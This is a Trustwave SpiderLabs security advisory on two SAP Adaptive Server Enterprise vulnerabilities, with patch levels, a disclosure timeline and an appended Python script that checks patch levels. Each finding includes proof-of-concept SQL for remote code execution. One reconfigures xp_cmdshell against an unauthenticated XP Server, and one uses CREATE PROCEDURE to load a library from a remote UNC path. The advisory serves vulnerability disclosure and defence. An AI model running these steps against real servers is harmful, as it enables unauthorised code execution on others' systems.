Trustwave SpiderLabs Security Advisory TWSL2015-015:
Multiple Vulnerabilities in SAP Adaptive Server Enterprise

Published: 07/17/2015
Version: 1.0

Vendor: SAP (www.sap.com)
Product: SAP Adaptive Server Enterprise (ASE)
Version affected: 15.5, 15.7, 16.0

Product description:
Relational database management system for UNIX, Linux, and Microsoft
Windows platforms.

Finding 1: SAP ASE on UNIX/Linux XP Server unauthenticated access vulnerability
Credit: Martin Rakhmanov of Trustwave

SAP Adaptive Server Enterprise allows unauthenticated connections to the
XP Server. This means anyone with a network connection to the XP Server
can execute extended stored procedures, including system-provided ones
such as xp_cmdshell. That in turn means arbitrary code execution in the
XP Server process context.

Below are step-by-step instructions for reproducing this issue against a
remote XP Server (the prerequisite is an XP Server running on a remote
host).

On an attacker-controlled SAP ASE installation, modify the interfaces file
to have an entry that points to the remote XP Server which will be
attacked:

    [REMOTE_XP]
    master=NLWNSCK,REMOTE,5002
    query=NLWNSCK,REMOTE,5002

Log in to the attacker-controlled SAP ASE using the 'sa' account and run:

    -- start local XP Server to make local database happy
    xp_cmdshell '-'
    go
    -- replace local XP Server with remote one
    sp_dropserver LOCAL_XP
    go
    sp_addserver LOCAL_XP, RPCServer, REMOTE_XP
    go
    -- Allow anyone to run xp_cmdshell
    sp_configure 'xp_cmdshell context', 0
    go
    sp_configure 'xp_cmdshell context', 1
    go
    sp_configure 'xp_cmdshell context', 0
    go

Reconnect and run:

    -- This will produce a file on the remote XP Server host
    xp_cmdshell 'id > ~/id.log'
    go

Examine the remote XP Server filesystem for the presence of the id.log
file.

Finding 2: SAP ASE on UNIX/Linux arbitrary code execution via CREATE PROCEDURE
Credit: Martin Rakhmanov of Trustwave

The CREATE PROCEDURE privilege allows users to create wrappers around
native code placed in libraries accessible to the server.
This poses a risk because any user granted CREATE PROCEDURE can execute
arbitrary code in the XP Server's process context by wrapping existing
libraries into stored procedures. This creates an extended stored
procedure, bypassing sp_addextendedproc, which requires elevated
privileges (sa_role). Additionally, users granted CREATE PROCEDURE can do
this in user databases, overriding system ESPs. Database owners can run
CREATE PROCEDURE as well.

    -- This will load kernel32 library from remote host and execute DebugBreak in it
    CREATE PROCEDURE DebugBreak AS EXTERNAL NAME "\\SERVER\PATH\kernel32.dll"
    go
    -- Attach a debugger to XP Server process to observe the break
    DebugBreak
    go

The above code can be executed as a user granted the CREATE PROCEDURE
privilege or as a database owner, and will load and run native code from
a remote box in the XP Server process context (Windows-specific because
of the UNC path).

Remediation Steps:
Apply one of the following vendor-supplied patches:

    SAP ASE 15.7 SP135
    SAP ASE Cluster Edition 15.7 SP135
    SAP ASE 16.0 SP01 PL02

Revision History:
03/31/2015 - Finding #1 (SecMsg ID 77045 2015) disclosed to vendor
03/31/2015 - Finding #2 (SecMsg ID 77183 2015) disclosed to vendor
07/14/2015 - Patch released by vendor
07/17/2015 - Advisory published

About Trustwave:
Trustwave helps businesses fight cybercrime, protect data and reduce
security risks. With cloud and managed security services, integrated
technologies and a team of security experts, ethical hackers and
researchers, Trustwave enables businesses to transform the way they
manage their information security and compliance programs while safely
embracing business imperatives including big data, BYOD and social media.
More than 2.5 million businesses are enrolled in the Trustwave
TrustKeeper® cloud platform, through which Trustwave delivers automated,
efficient and cost-effective data protection, risk management and threat
intelligence.
Trustwave is a privately held company, headquartered in Chicago, with
customers in 96 countries. For more information about Trustwave, visit
www.trustwave.com.

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.

https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express
or implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be
liable for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of
liability for consequential or incidental damages so the foregoing
limitation may not apply.
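
Added example (not part of the Trustwave advisory or SAP's tooling): a
patch-level check against the levels named under Remediation Steps, run
over the output of "select @@version". The banner layout, the sample
banners and the rule that later SP/PL levels also carry the fix are
assumptions made for this example.

```python
import re

# Fixed (SP, PL) levels per release, from the advisory's Remediation Steps.
# The Cluster Edition of 15.7 shares the SP135 level.
FIXED = {"15.7": (135, 0), "16.0": (1, 2)}
# Releases the advisory lists as affected.
AFFECTED = {"15.5", "15.7", "16.0"}


def parse_banner(banner):
    """Return (release, sp, pl) from an @@version banner.

    Assumed layout: 'Adaptive Server Enterprise/<release>...' with optional
    upper-case 'SPnn' and 'PLnn' tokens somewhere in the string.
    """
    m = re.match(r"Adaptive Server Enterprise/(\d+\.\d+)", banner.strip())
    if not m:
        raise ValueError("not an ASE version banner")
    sp = re.search(r"\bSP(\d+)\b", banner)
    pl = re.search(r"\bPL(\d+)\b", banner)
    # A banner without an SP token (older ESD builds) predates every fix.
    return m.group(1), int(sp.group(1)) if sp else 0, int(pl.group(1)) if pl else 0


def assess(banner):
    """Classify a server against TWSL2015-015."""
    release, sp, pl = parse_banner(banner)
    if release not in AFFECTED:
        return "not-listed"               # advisory makes no statement
    fixed = FIXED.get(release)
    if fixed is None:
        return "affected-no-fix-listed"   # e.g. 15.5: no patch named
    # Assumption: SP/PL levels are cumulative, so later levels are fixed too.
    return "patched" if (sp, pl) >= fixed else "vulnerable"


# Constructed sample banners (EBF and build numbers are placeholders).
SAMPLES = [
    "Adaptive Server Enterprise/15.7/EBF 00000 SMP SP122 /P/x86_64/"
    "Enterprise Linux/ase157sp12x/0000/64-bit/FBO/constructed",
    "Adaptive Server Enterprise/16.0 SP01 PL02/EBF 00000 SMP/P/x86_64/"
    "Enterprise Linux/ase160sp01plx/0000/64-bit/FBO/constructed",
    "Adaptive Server Enterprise/15.5/EBF 00000 SMP ESD#5/P/x86_64/constructed",
]

if __name__ == "__main__":
    for b in SAMPLES:
        print(f"{assess(b):24} {b[:48]}")
```
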